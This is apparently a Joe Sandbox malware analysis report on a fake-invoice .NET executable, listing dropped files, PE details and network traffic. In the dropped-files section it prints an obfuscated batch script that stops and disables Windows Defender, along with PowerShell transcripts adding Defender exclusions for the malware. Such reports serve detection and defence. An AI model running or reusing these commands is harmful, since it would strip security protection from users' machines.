Joe Sandbox View:	Filename: Download_quotation_PR #371073.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse Filename: PurchaseOrdersCSTtyres004786587.exe, Detection: malicious, Browse Filename: 3zKVfxhs18.exe, Detection: malicious, Browse Filename: AWB783079370872.docm, Detection: malicious, Browse Filename: DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse Filename: Payment Advice 170221.exe, Detection: malicious, Browse Filename: Payment Receipt.jar, Detection: malicious, Browse Filename: miner.exe, Detection: malicious, Browse Filename: 875666665.xlsm.xlsm, Detection: malicious, Browse Filename: DOCX.doc.doc, Detection: malicious, Browse Filename: v.exe, Detection: malicious, Browse Filename: uaa.exe, Detection: malicious, Browse Filename: r.exe, Detection: malicious, Browse Filename: j.exe, Detection: malicious, Browse Filename: 99.exe, Detection: malicious, Browse Filename: m.exe, Detection: malicious, Browse Filename: n.exe, Detection: malicious, Browse Filename: DdV1LG7bLJ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....).....)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	8399
Entropy (8bit):	4.665734428420432
Encrypted:	false
SSDEEP:	192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5:	B2A5EF7D334BDF866113C6F4F9036AAE
SHA1:	F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256:	27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512:	8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious:	false
Preview:	@%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eh4satsn.nas.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgcjqlgh.pwd.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnzmxykz.rbj.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkxxjrtw.qd5.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\Documents\20210222\PowerShell_transcript.320946.Re__E71x.20210222091427.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	894
Entropy (8bit):	5.376269224946531
Encrypted:	false
SSDEEP:	24:BxSAt3y7vBZOx2DOXUWeSuau1tiWUHjeTKKjX4CIym1ZJXSuau1t2:BZuvjOoO+SqUqDYB1ZcL
MD5:	595C0A5D974371A138CF928DDFC67706
SHA1:	25BC2F910113860D9A0BBC48107712027A222A49
SHA-256:	75B76911A4EABCA0C44848FB69957094B7FA7007A2FA8068973748C88C77B81D
SHA-512:	7B231034238919743D0E6431FEF27949EE9F26B02718DC0DD34F9CDCEA3B2244B3BD304C909DB2A1EBBAD7D019DE2F00E51F1C6952B22649CB034E0F77B5162B
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210222091454..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..Process ID: 4488..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210222091454..********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe -Force..

C:\Users\user\Documents\20210222\PowerShell_transcript.320946.cMT2273D.20210222091415.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5905
Entropy (8bit):	5.412975650143772
Encrypted:	false
SSDEEP:	96:BZJjONf23qDo1ZO23ZEjONf23qDo1ZELA9AzAjZmAjONf23qDo1ZVcADADALZy:XPyf+
MD5:	D685B014F0019A858EE92B195DCA090B
SHA1:	FFA1301E4F435E6B6146DFAE432E08788B47BC70
SHA-256:	82B5F4A49B04BE9C6A40BE04F9874463BDADB60D9C6A62CBA1F24FAAE5D624EB
SHA-512:	C5A498A372EB0320BF206186C4FD31FF70EE2E52CEBB636CF8C848623E579C5F6331FB13118761236A7E73534C734FF22A7959BDE1461198C436B3F5A29C0409
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210222091431..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe -Force..Process ID: 7088..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210222091432..******************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe -Force..********************..Windows PowerShell transcript start..Start time: 20210222091720..Usernam

C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	209408
Entropy (8bit):	5.559500913037027
Encrypted:	false
SSDEEP:	1536:DVz5TWmVK3zUNBhgT2tPo55rKrFUcDOC53bzf01I:DVRV+bIFNMI
MD5:	379482795DA0042D0070E6AE599A369B
SHA1:	BAF26CFE3C8BA84FC3DA7CC2DA74741130F2BB21
SHA-256:	7D862F96808968BBE9CA5BF571335F86CD100FAA6D131A1E148EF8C54F5A4EED
SHA-512:	791604C6BEAD65E2D9E7D8BF4D355CA09078E0A98BAACFEC2D0A7B91F4B57EB18A6C48CC8FE24867B014E86312138905B3D144404A6E645DBEAB1D5ECEEBAA70
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..x..........n.... ........@.. ..............................,B....@................................. ...K............................`....................................................... ............... ..H............text...tw... ...x.................. ..`.rsrc................z..............@..@.reloc.......`.......0..............@..B................P.......H.......h<...Z...........................................................".(.....~s.........s.........s.........B.(.......(......0...........r...p....r...p....s........+...&.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...........:...................o).........o4.......8........*........$.j........0...........r...p....r...p....s........+...'.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...

C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.559500913037027
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CN-Invoice-XXXXX9808-19011143287989.exe
File size:	209408
MD5:	379482795da0042d0070e6ae599a369b
SHA1:	baf26cfe3c8ba84fc3da7cc2da74741130f2bb21
SHA256:	7d862f96808968bbe9ca5bf571335f86cd100faa6d131a1e148ef8c54f5a4eed
SHA512:	791604c6bead65e2d9e7d8bf4d355ca09078e0a98baacfec2d0a7b91f4b57eb18a6c48cc8fe24867b014e86312138905b3d144404a6e645dbeab1d5eceebaa70
SSDEEP:	1536:DVz5TWmVK3zUNBhgT2tPo55rKrFUcDOC53bzf01I:DVRV+bIFNMI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..x..........n.... ........@.. ..............................,B....@................................

File Icon


Icon Hash:	68c6a6ce96b28acc

Static PE Info

General
Entrypoint:	0x40976e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9720	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa000	0x2b588	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8000	0x19c0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x36000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7774	0x7800	False	0.58984375	data	6.86065163545	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa000	0x2b588	0x2b600	False	0.209023775216	data	5.11612515343	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x36000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xa268	0x3751	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xd9bc	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x1e1e4	0x94a8	data
RT_ICON	0x2768c	0x5488	data
RT_ICON	0x2cb14	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 4286513152
RT_ICON	0x30d3c	0x25a8	data
RT_ICON	0x332e4	0x10a8	data
RT_ICON	0x3438c	0x988	data
RT_ICON	0x34d14	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x3517c	0x84	data
RT_VERSION	0x35200	0x388	data	English	United States

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	Copyright 2022 BxJYdGrf. All rights reserved.
Assembly Version	1.5.0.2
InternalName	RJFBoOwW.exe
FileVersion	5.6.1.0
CompanyName	SzicdLQh
LegalTrademarks	AJUBNIBr
Comments	WopzIgVT
ProductName	RJFBoOwW
ProductVersion	1.5.0.2
FileDescription	IPeVGEzN
OriginalFilename	RJFBoOwW.exe
Translation	0x0409 0x0514

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 09:13:24.126110077 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.179238081 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.179402113 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.180315971 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.233103991 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351891041 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351912022 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351926088 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351943016 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351958990 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351975918 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.351980925 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.351991892 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.352014065 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.352029085 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.352031946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.352047920 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.352061033 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.352132082 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.353173018 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.353193045 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.353374958 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.354460955 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.354491949 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.354691982 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.355688095 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.355720043 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.356909990 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.356939077 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.356972933 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.357428074 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.358133078 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.358158112 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.358251095 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.359350920 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.359368086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.359440088 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.379271030 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.379302025 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.379435062 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.379853964 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.379883051 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.380573988 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.381104946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.381145000 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.381272078 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.382399082 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.382443905 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.382668972 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.404835939 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.404877901 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.405322075 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.405401945 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.405441999 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.406636953 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.406656027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.406660080 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.407170057 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.407855034 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.407877922 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.407957077 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.409121037 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.409147024 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.409225941 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.410351038 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.410381079 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.410480976 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.411583900 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.411619902 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.411700010 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.412812948 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.412847042 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.413264990 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.414052963 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.414077044 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.414143085 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.415281057 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.415298939 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.415345907 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.416522980 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.416543007 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.417748928 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.417804003 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.418329000 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.418346882 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.418430090 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.419559956 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.419578075 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.419605017 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.420819044 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.420835972 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.420876026 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.422065973 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.422086000 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.422120094 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.423300982 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.423347950 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.423422098 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:24.424580097 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:24.424612045 CET	80	49733	104.21.71.230	192.168.2.4
